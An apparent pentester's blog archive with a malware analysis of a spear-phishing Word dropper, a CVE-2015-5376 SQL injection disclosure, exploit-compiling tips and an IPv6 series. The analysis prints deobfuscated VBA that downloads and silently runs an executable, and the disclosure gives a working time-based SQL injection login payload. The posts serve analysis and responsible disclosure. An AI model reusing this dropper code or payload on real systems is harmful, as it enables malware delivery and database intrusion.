Feb 152016

Last week I was able to obtain a real world malware sample as used in a spear phishing campaign targeting an Austrian corporation. The unknown attacker targeted multiple people within the organisation using several different mail and attachment variants. All mails tried to trick the respective recipient into opening the attached Word document.

Screen Shot 2016-02-14 at 17.16.14

As I was interested in the actual malware I uploaded several variants to VirusTotal. The detection rate was very low ranging from none to only a few detections depending on the uploaded variation. This actually indicated a targeted attacked and further drew my attention.

Dynamic Analysis

For my detailed analysis I randomly picked the Word document Rechnung nr.XXXXX.doc (anonymised) with a SHA1 hash of 520df6b381b0738f464b21a3729f9afa4f61d79f. To get a rough understanding of the used attack vector(s) I opened the document in a secure virtualised environment while recording all executed actions. Thereby I learned that some kind of Office macro execution was triggered:

Screen Shot 2016-02-14 at 17.44.10

As I wanted to learn more about the behaviour of the malware I enabled macros and after a few seconds the following error showed up. Well, this does not look like the most robust malware…

Screen Shot 2016-02-14 at 17.48.36

Anyway, from my recordings I could actually tell what went wrong: The first thing I inspected was the output of Procmon. I immediately noticed that Word opened a HTTP connection to arvor.biz ( Well, that’s strange…

Screen Shot 2016-02-14 at 17.54.55

Next I inspected my Wireshark log and found the corresponding TCP stream showing a failed HTTP GET request.

Screen Shot 2016-02-14 at 17.59.02

Based on the fact that no further actions have been recorded, one most likely can conclude that our Word document is a simple dropper: Its only task is to (silently) download and execute the next step of the attack. Nevertheless its simple task, I was still interested in how it works in detail.

Static Analysis

At first I opened the file in a hex editor and was surprised: It certainly did not look like a Word document but more like an EML file.

Screen Shot 2016-02-14 at 18.17.46

After some time I finally figured out that it is an MHTML file. Microsoft Word is able to save documents not only as .doc and .docx but also as Web Page (.htm) and as Single File Web Page (.mht).

Screen Shot 2016-02-14 at 19.09.26

Even if a .mht file is then renamed to .doc it still works. This is also exactly what we have here! The special thing about renamed .mht files is that they look (from their file extension) and feel (after opening them within Word) like a normal Word document but that they in reality are completely different. One such difference is their reported MIME type:

Screen Shot 2016-02-14 at 19.32.56

This example also shows why it is so difficult for a security product vendor to make a good solution: It is the edge case that matters (a lot!).

Malware Extraction

With the knowledge of the file format I finally could identify the following payload documents:

  • file:///C:/CF649EC6/fddsfdsf.htm: contains XML garbage
  • fdsfdsf: contains undecodable base64 garbage
  • sdfsdffff: contains plaintext garbage
  • file:///C:/CF649EC6/fddsfdsf.files/oJUGdsfcxz.mso: the actual base64 encoded container
  • file:///C:/CF649EC6/fddsfdsf.files/gFHjsdddd.xml: the .mht entry point – necessary to create a valid document. References the malicious oJUGdsfcxz.mso component so it gets executed

The actual malware could then be easily identified because of the .mso file extension: .mso files were used (long ago) to embed Word documents within mail messages. Checkpot!

However, to get the source of the malicious macro I first had to decode the base64 encoded .mso. To do so I saved it as malware.b64 and decoded it using the base64 command:

base64 -D malware.b64 >malware.activemime

After that I got a file with an ActiveMime file header:

Screen Shot 2016-02-14 at 19.50.47

With the help of the SANS article XML: A New Vector For An Old Trick I was able to identify a valid zlib header 78 9C at byte offset 50. Hence, I removed the first 50 bytes using my hex editor of choice Hex Friend and saved it as malware.zlib. To extract the containing CDF V2 Compound Documents I used the following command:

openssl zlib -d <malware.zlib >malware.cdf

To extract the therein encoded macro I then used olevba as follows:

olevba.py -a malware.cdf >analysis.txt

You can download the full results here.


To finally find out what the malware is doing in detail I had to deobfuscated the sourcecode. This manual process took me about half an hour and I managed to bring the number of lines from 370 down to less than 20:

Sub downloadMalware()
    Dim var_file_handle As Long
    Dim var_HTTP_response_body() As Byte
    Dim var_HTTP_request As Object
    var_textbox1_url = UserForm1.TextBox1 '
    var_Path_to_Temp_plus_Textbox2 = Environ(StrReverse("PMET")) & UserForm1.TextBox2 'yFUYIdsf.exe
    Set var_HTTP_request = CreateObject(StrReverse("1.5.tseuqerPTTHniW.PTTHniW"))
    var_HTTP_request.Open StrReverse("TEG"), var_textbox1_url, False
    var_HTTP_response_body = var_HTTP_request.ResponseBody
    Set var_HTTP_request = Nothing
    var_file_handle = FreeFile
    Open var_Path_to_Temp_plus_Textbox2 For Binary Access Write As #var_file_handle
    Put #var_file_handle, 1, var_HTTP_response_body
    Close #var_file_handle
    var_shell_result = Shell(var_Path_to_Temp_plus_Textbox2, vbHide)
End Sub


Finally, we now know for sure that the malware simply tries to download an executable from to the machine’s temp folder as yFUYIdsf.exe. If the downloads succeeds, it then also launches it. In this case however, the server had already been taken down. This is also the reason why we got the error message during the dynamic analysis in the first place. Furthermore there is no error handing of any sort.

The more interesting thing about this dropper however is, that it abuses the .mht file format to evaded detection. What a great idea… It almost worked 😉

Jan 102016

While trying to compile Windows exploits from the Exploit Database (exploit-db.com) I quite often faced an error similar to the following:

2789.obj : error LNK2019: unresolved external symbol _closesocket@4 referenced in function _main

The message already clearly says what is going wrong: There is a missing external dependency. Most likely we simply need to link one or more external libraries. The big question is how to do that efficiently?

In this post I will show you how to fix these errors on the example of Exploit DB exploit #2789: Microsoft Windows – NetpManageIPCConnect Stack Overflow Exploit (MS06-070).

After downloading the exploit’s source and fixing all the syntax errors CL.exe is still unable to compile the exploit: (Hint: Don’t forget to use the Developer Command Prompt!)

Screen Shot 2016-01-10 at 19.34.56

As I already said, we are missing an external library. Therefore we have to identify which one we need and then we have to tell CL.exe to link it. The easiest way to find the right library is to search for the MSDN function description of the first missing symbol. Quite on the bottom of the MSDN page you then find a section called “Requirements”. Within this section the parent library is listed:

Screen Shot 2016-01-10 at 20.58.38

So we already solved the first problem: We now know that closesocket is provided by Winsock2 (Ws_32.lib). To finally link Ws_32.lib we simply have to add the following #pragma comment preprocessor directive within the exploit’s source code:

#pragma comment(lib, "Ws2_32.lib")

Although it should not matter where in the code it is placed, for readability reasons I really recommend to add it at the top of the file. After that the modified exploit can be successfully compiled:

Screen Shot 2016-01-10 at 19.34.34

Some exploits also need to be linked to more than one library so you may have to repeat the explained process several times. Based on my experience the two most linked libraries within Windows exploits are Winsock2 (Ws2_32.lib) and the Windows User component (user32.lib). A good trick – although for sure not any kind of best practise – is to always add those two after encountering an unresolved external symbol without any further thought. It already saved me quite some time.

Dec 272015

Over the past few month it has been quite silent here…

The reason was that I was fully – and I really mean fully – occupied by preparing and taking the Offensive Security Certified Professional (OSCP) exam.

I can now proudly declare that I survived and that I passed the exam on the first attempt! Thanks Offensive Security for consuming so much of my time and nerves 😉


Anyway, expect a few post to come in the following weeks. I already have some ideas floating around…

Sep 142015

In accordance with Google’s responsible disclosure policy I’m releasing the details for CVE-2015-5376 “WiNPAT Portal 3 – Unauthenticated SQL Injection Exploit” 90 days after the initial report to the software manufacturer GSI Office.

They took the reported vulnerability very seriously and fixed it within days. Furthermore they even audited the rest of the application for possible further technical (with a focus on the OWASP Top 10) and/or logical problems.

Congratulations GSI Office, that’s the perfect way to handle a security related bug report. And please keep in mind: Not a single software on this earth is bug free: It really depends on how you handle them!

# Title: WiNPAT Portal 3 - Unauthenticated SQL Injection Exploit
# Date: 8.7.2015
# Exploit Author: Florian Bogner [ mail: florian (at) bogner (at) sh - web: https://bogner.sh ]
# Vendor Homepage: http://www.gsi-office.de/en/products/winpat-portal
# Version: verified for - 
# Tested on: IIS7.5 and MS SQL Server
# CVE : CVE-2015-5376

Application Description
WiNPAT Portal is a web based IT-solution for law firms and corporate intellectual property departments in industry and research. Using WiNPAT Portal you gain the ability to handle all tasks in the area of IP management in a timely manner via the internet. With WiNPAT Portal we have created an environment to provide simultaneous access to all database driven applications which you have deployed in your office or department. In interaction with the WiNPAT process oriented workflow management, it automates relevant business processes in a transparent and comfortable way.

Vulnerability Description
This issue affects the login form of GSi Office's WiNPAT Portal 3. Although it has only been verified for version 3.2 to 3.6 it is probably applicable for a wider version range. It is caused by not validating the user's input of the login form's username field and thereby allows an attacker to insert malicious SQL commands. This is a very severe issue as it can be exploited without any prior authentication. Only blind time based attacks are possible.

To exploit this issue the HTTP POST parameter LoginControl%24txtUserLogin of the login form has to be modified. An easy way to validate the vulnerability is to use  the following credentials:

Username: 1');WAITFOR DELAY '0:0:10'--
Password: [None]

If successful, the page load will take about ten seconds. To further exploit this vulnerability it is recommended to use sqlmap (http://sqlmap.org/).
Aug 182015

1439896694_internet_earthIn the need for a simple and easy to use OS X based Always On VPN solution? If so, I may have something for you.

We are using a straight forward L2TP over IPSec VPN connection for connecting into our Pentesting lab. Beside giving me access to many of my most needed tools it also allows me to surf the web without any proxy or firewall limitation. As I encountered several VPN disconnects over my work day I decided to solve it once an forever by automatically reconnecting the VPN after a dropout.

To do so I wrote the following Apple Script based on this Apple Support Communities discussion.

global PING_HOST
global VPN_NAME

set PING_HOST to "vpn.example.com" # A host on the web to ensure the current connection is working at all
set VPN_NAME to "Your VPN" # The name of the VPN connection to dial (works with PPTP, L2TP over IPSec and Cisco IPSec)

on idle

		# as the ping causes an exception if no response is received we only try to connect to the server if it's really reachable and thereby surpress error messages
		do shell script "ping -c 1 -W 500 " & PING_HOST

		tell application "System Events"
			tell current location of network preferences
				set myConnection to the service VPN_NAME
				if myConnection is not null then
					if current configuration of myConnection is not connected then
						connect myConnection
					end if
				end if
			end tell
		end tell

	end try

	return 2 # schedule to run again in two seconds
end idle

Simply save it as an application and check the box “Stay open after run handler”:
Screen Shot 2015-08-18 at 20.17.12
As long as the App it is running, your VPN connection will be redialed automatically. This small helper gained a permanent spot in my Dock!

PS: To give the App a nicer appearance you may want to change it’s icon to this free one. Here is a tutorial on how to do that.

Edit: Updated the code to use the “on idle” handler

Jul 262015

In this last part of the series IPv6 for pen testers we will now cover how address autoconfiguration works without the need for a central DHCP server. I really encourage you to read part 1, 2 and 3 of this series as they cover the IPv6 fundamentals needed to understand the following paragraphs.

In IPv4 a central DHCP server was used to autoconfigure the IP addresses and the standard gateways for all clients. In IPv6 however, routers advertise the on-link networks and the available routes on their own using multicast. That means that as soon as a new client is connected to a network, all the available routers advertise all the avilable network prefixes. The client then assigns itself an IPv6 address within each on-link network and adds all other prefixes to his routing table. The full IPv6 addresses for the on-link networks are created by appending the host portion as generated by the  EUI-64 algorithm as discussed in part 3 to the advertised network prefixes. We will now discuss this process in more detail with the help of the following image: 

In IPv6 all routers on a network join the so called All-Routers multicast address FF02::2. This group is then used to periodically advertise all available on-link network prefixes and all routable destinations. However as it takes up to two minutes to receive all information a recently booted system can trigger a full re-advertisement of all prefixes by sending a Router Solicitation message to the All-Routers multicast group. After that all routers directly reply with Router Advertisement messages with all on-link and all routable destinations. As already mentioned the client than adds a new IPv6 address for each prefix by appending its EUI-64 host ID. This process allows a client to join a network without any prior configuration.

If it is necessary to provide more information to the clients (like DNS servers) the special “Other configuration” bit can be set in the Router Advertisement message.  It indicates that other configuration information is available via DHCPv6. This type of DHCP server is called stateless because it only hand out static configuration and does not track its clients.

Beyond using Stateless Address Autoconfiguration (SLAAC), as this process is called, it is still possible to use a fully featured DHCPv6 server instead.

Router Advertisement Flood

A pen tester specific IPv6 technique was discovered by Sam Bowne, a well known IT security expert. He developed a Denial of Service exploit for all up-to-date operating systems (Linux, Windows and OS X) based on Router Advertisement messages. It works by flooding the network with new route advertisements that get processed by the attacked clients. During this processing the systems get practically unusable. Sam captured several videos to showcase the result of the flood on this website.

Further Reading

Before rounding this series up here are some references for your further reading:


Although already standardized in 1998 IPv6 still has not fully reached the end customers. Only very few ISPs in Europe by default even provide IPv6 address to their customers and even less companies use IPv6 within their networks. However as IPv4 addresses will eventually run out in the not too distant future companies have to prepare their equitement and train their employees. This is especially important as virtually every new network component is IPv6 capable and most of them even have it pre-enabled. As we have learned in this series IPv6 introduces many new concepts and some of them can be misused. I currently advise everyone to disable the IPv6 stack on their network components if not used and I highly recommened companies to train their administrators so that they know how IPv6 works and what challenges it brings with it.

Jul 142015

Welcome back at part three of my blog post series about IPv6 for pen testers. In part 1 we already covered the advantages of IPv6 and how IPv6 addresses look like and in part 2 we discussed the three different IPv6 address types and how Link Local adresses are generated. I encourage you to read both posts before continuing as they cover the basics for this entry. We will now take a closer look at IPv6 multicast and how Layer 2 address discovery is implemented.


Although already available in IPv4 almost nobody ever heard of multicast before. What it does is, it enables a one-to-many communication pattern on a network level. To do so, so called multicast groups are formed. These groups are basically special IP adresses within the so called IP multicast range ( in IPv4 and ff00::/8 in IPv6). A client that is interested in joining the communication in such a group instructs the network to send this group specific communication to its network port. All clients that are not interested do not even receive the traffic as they did not join the group. If you are interested in what multicast groups a system is joined you can use the following commands:

Linux: netstat -g
Windows: netsh interface ipv6 show joins

With IPv6, multicast will be a fundamental part of every network  and will even replaced all broadcasts.  This is especially important as broadcasts have been a problem for years in large networks as they are sent so all systems in the whole network and thereby cause a lot of unnecessary network traffic. Furthermore every broadcast has to be processed by the end device and thereby wastes processing power.

Neighbour Discovery

However without broadcasts a problem arises: ARP the Address Resolution Protcol used for resolving IPv4 to MAC addresses and thereby enabling the necessary OSI Layer 2 communication can not be used anymore and a replacement has to be defined.

This replacement is called Neighbour Discovery (ND) and is built on ICMPv6 and IPv6 multicast. It works by sending a Neighbour Solicitation (NS) request to the address dependent Solicited-Node multicast address while listening for the correspoding Neighbour Advertisement (NA) answer. Before covering this process in detail here are the commands used for showing all known neighbours similar to the ARP table:

Linux: ip -6 neigh
Windows: netsh interface ipv6 show neighbors

Layer 2 Address Discovery

By enabling IPv6 and by configuring an address the system not only allows you to communicate using this address but also automatically joins two IPv6 multicast groups. The first is the already mentioned Solicited-Node multicast group. It is dynamically generated by taking the last 24 bits of the corresponding IPv6 address while prepeding the ff02::1:ff00:0/104 Solicited-Node multicast prefix. The second is the IPv6 All-Nodes multicast group ff02::1 that is joined by all IPv6 capable systems.

Now let us recap using an example: By setting up the IPv6 address 2000::9999:1111 on System A it will join the Solicited-Node multicast address ff02::1:ff99:1111 and the All-Nodes multicast address ff02::1.

If in turn System B wants to send data to System A (2000::9999:1111) it needs both the IPv6 address and the corresponding MAC address. To get the MAC address, it sends a Neighbour Solicitation (NS) message to the Solicited-Node multicast address ff02::1:ff99:1111. System A will reply with a Neighbour Advertisement (NA) containing its MAC directly to System B. After that System B has all the necessary information and can send data to System A. The image below illustrates the process.

Duplicate Address Detection

Beside the discovery of Layer 2 addresses this process is is also used to avoid address collisions. Before a new IPv6 address is assigned to an interface the systems sends a Neighbour Solicitation message to the corresponding Solicited-Node multicast address. However instead of using the interface’s IPv6 address – which has not been set up yet – the unspecified address :: is used instead. If the address is already in use the owner replies with a Neighbour Advertisement to the IPv6 All-Nodes multicast address and the setup process is aborted. If no answer is received within a given time frame it is assumes that no-one else is using it and the setup continues. This process is called Duplicate Address Detection (DAD).

Before summing up let us briefly cover a good trick that can be used by pen testers to detect all IPv6 capable devices. As we already discussed there is the All-Nodes IPv6 multicast group. In contrast to IPv4’s broadcast you can ping this group while getting a reply from all IPv6 devices on the network. This is a great way to find your targets! The following commands show how to ping the All-Nodes IPv6 group:

Linux: ping6 -I eth0 ff02::1
Windows: ping ff02::1

To summarize, we covered what IP multicast is and what it is used for. Furthermore we talked about IPv6’s ARP replacement namely Neighbour Discovery and how it works in detail. In the next and final part we will then cover how IPv6 Addresses are managed without the need for a DHCP service and why you still need one.

Jul 082015

Welcome to part two of my introduction to IPv6 for pen testers. If you did not read the first part I really encourage you to do so before reading any further. In the next paragraphs we will briefly discuss the different IPv6 address types and cover Link Local addresses in detail.

IPv6 Address Types

In IPv6 there are three different kinds of address:

  • Unicast: These addresses are used for direct one-to-one communication. There are global and local unique unicast and Link Local addresses. Global one’s are managed by IANA and right now all are within the 2000/3 network. Local one’s can be used within organisations to for example identify the location of a system and can either use the FC00/8 or FD00/8 network. Finally, Link Local one’s use the FE80/10 network and are only valid for the directly connected network segment. We will dicuss those shortly.
  • Multicast: These special reserved addresses in the FF00/8 network are used for one-to-many communication. IPv6 multicast completely replaced the need for broadcasts and are used extensivly during IPv6 operation.
  • Anycast: Any unicast address can be used for anycast as soon as it is assigned to multiple systems. Thereby a client automatically connects to the closest anycast server. This enables load balancing on the network layer.

A system in an IPv6 world will almost ever have multiple addresses assigned to its interfaces. For example as soon as IPv6 is used on an interface a Link Local address is generated and assigned, furthermore the network will provide one or more unicast addresses used for communicating with the outside world or the company network.

Link Local Addresses

We will now cover Link Local addresses in more detail. As already briefly discuessed they are automatically generated and are only valid for the directly connected network segment. Any device that claims to speaks IPv6 supports and uses them. As soon as a new device is connected it can be reached using its Link Local IPv6 address. The following steps (based on RFC2464) show how to generate the IPv6 Link Local address from a NIC’s MAC:

  1. Get the 48bit MAC address of the NIC
  2. Convert the MAC to binary and flip the 7th bit. This is necessary as in the MAC address if set, this bit identifies a locally administrated and thereby modified address. However in the desired EUI-64 format the bit is interpreted in the the exact opposite way, so that a set bit indicates a globally unique address as burned in by the manufacturer (again see RFC2464).
  3. In the middle of the MAC address with the already flipped bit add FFFE.
  4. Finally, the Link Local FE80 network prefix has to be prepended while filling everything in between with zeros so that a valid IPv6 address is generated.

The following example shows how to apply this algorithm:

1.) Get the MAC address:
a4:52:6f:44:7e:69 => a4526f447e69
2.) Convert the MAC to binary:
10100100 01010010 01101111 01000100 01111110 01101001
3.) Flip the 7th bit:
10100110 01010010 01101111 01000100 01111110 01101001 => a6526f447e69
4.) In the middle add FFFE
5.) Add the Link Local FE80 network prefix and generate final IPv6 address

I covered this algorithm in that much detail because it is the first really interesting IPv6 aspect from a pen tester’s point of view. Many systems already have IPv6 preenabled however most administrators only block access using IPv4 firewalls. That means that it is always worth a try to check if a server offers more services using IPv6 than it does over IPv4. To do so you simply ping the server using IPv4 to get its MAC address cached in your ARP table. Then you apply the above algorithm to this MAC and voilá you now have the server’s Link Local IPv6 address ready to be scanned. As I was tired of repeating this steps over and over again a colleage and I wrote IPv4_to_IPv6_address_generator. It is a small python tool that simply automates the above steps and it works on Windows and Linux.

After all that hard work of generating the Link Local IPv6 address we can now connect to the network and the device is ready to be used. If you are interesting if your computer already has IPv6 enabled just use one of the following commands. They will list all your currently assigned IPv6 addresses:

Linux: ip -6 addr
Windows: netsh interface ipv6 show addresses

Summing up we discussed the different IPv6 address types and generated a Link Local address from a NIC’s MAC. In the next post of this series we will take a closer look on IPv6 multicast and why it will completely replace broadcasts. Furthermore we will discuss how Layer 2 address discovery works with IPv6.

Jul 012015

Due to the shortage of IPv4 addresses IPv6 has been developed. It is the successor protocol that will be used in parallel to IPv4 to drive the Internet’s underlying infrastructure. In this series of four blog posts I will give a general introduction to the most important aspects of IPv6 with a focus on the pen tester’s point of view. Be aware that this series is about the fundamentals and thereby does not cover all the dirty little details.

In part 1 we will cover IPv6 in general and how an IPv6 address look like.

IPv6 Overview

The easiest to spot change is that the IPv6 addresses are a lot longer than its IPv4 siblings. The additional bits increases the available address space and thereby allow us to address a lot more devices. Here are the numbers:

  • IPv4 address: 32bit (4294967296 available IP addresses)
  • IPv6 address: 128bit (340282366920938463463374607431768211456 available IP addresses – And yes, every single atom on the earth surface can be addressed with IPv6. You can even assign more than 100 addresses to each one – Reference)

Furthermore IPv6 has many great features built in like:

  • Mobility (you always use the same IP address wherever you are)
  • Security (IPsec is built in)
  • It eliminates the need to use NAT

Now let’s take a more close look at how an IPv6 address looks like:

How does an IPv6 address look like

Here is an IPv6 address in its full glory: fe80:0000:0000:0000:02aa:00ff:fe28:9c5a/64

As you can clearly see, IPv6 addresses are not as easy to write and remember as IPv4 addresses. They are composed of 8 sections each representing 16bits of the full 128bit address space written in hexadecimal notation. Furthermore it is compose of two parts: the network portion and the host portion. The network portion is defined using the CIDR notation (/64 in the above example) and is used for traffic routing. To make it a bit easier for us humans, there are three tricks that can be applied to make the address a little easier to handle:

  1. The first thing you need to know is that is does not matter if you use lower case or capital letters. You can even mix case if you like to. That means that the following examples are valid addresses and all three represent the same host:
    Example 1: fe80:0000:0000:0000:02aa:00ff:fe28:9c5a
    Example 2: FE80:0000:0000:0000:02AA:00FF:FE28:9C5A
    Example 3: Fe80:0000:0000:0000:02Aa:00fF:fE28:9c5A
  2. Secondly, leading zeros can be removed for each section. However be aware that if a section contains only zeros at least one has to remain. Again the following examples are valid addresses for the same host:
    Example 1: fe80:0000:0000:0000:02aa:00ff:fe28:9c5a
    Example 2: fe80:0:0:0:02aa:00ff:fe28:9c5a
    Example 3: fe80:0:0:0:2aa:ff:fe28:9c5a
  3. 3) Finally, rule number three allows you to replace consecutive sections of zeros with ::. However be aware that this is allowed only once. While parsing the address the computer knows that IPv6 addresses always have to have eight sections and simply replaces the :: with the correct number of sections filled with zeros. The following examples illustrate the process:
    Example 1: fe80:0:0:0:2aa:ff:fe28:9c5a => fe80::2aa:ff:fe28:9c5a
    Example 1: 2000:0:0:0:111:ffdc:0:8f21 => 2000::111:ffdc:0:8f21

In this post we discussed some advantages of IPv6, how addresses look like and what tricks can be used to shorten them. In the next one we will take a closer look at the different addresse types and IPv6 Link Local addresses.

Jun 182015

Today I want to introduce a small helper tool, namely lsdns. I wrote it as I always struggle to find the correct IP and hostname mappings while writing my pentest reports. lsdns is a small python script that queries a DNS server for a given IP range and outputs the results in a CSV compatible format. In this post I will explain why it is useful to me, where you can get it and how to use it.
2015-06-03_11h05_56All our pentest reports document the found vulnerabilities, possible mitigation strategies and logically list all affected systems. To help our customers we always try to provide both, the IP address and the corresponding hostname for any computer mentioned. Although this is generally quite easy, it can be quite a pain if you can not access the original DNS server while documenting the findings either because it is only available from the internal company network (and you did not find a vulnerability that allows you to query it externally) or split DNS is used.

To at least partially solve this issue for me I wrote lsdns. It is a small application that uses reverse DNS to get all hostnames for a given IP range. The output can be redirected to a CSV file and can be used while writing the report to look up either the hostname or the IP address of a vulnerable system.


To install it you need to have python2 and the python setuptools already preinstalled. Then you can either clone the git repository or simply download the latest ZIP from GitHub. Before you can use it you have to manually install the dependencies from within the dependencies folder by running the corresponding setup.py scripts. After that you are ready to go.


dnsls is a very simple to use command line utility. The following example shows how to do so:

./lsdns.py <dns server to query> <IP address or range>
Example: ./lsdns.py

By redirecting stdout to a file a valid CSV file is created. To still give you feedback about the progress a dot is printed for each host. A sample is available here.

I hope someone else also sees a value in dnsls. If so, it is freely available for you under the terms of the MIT licence.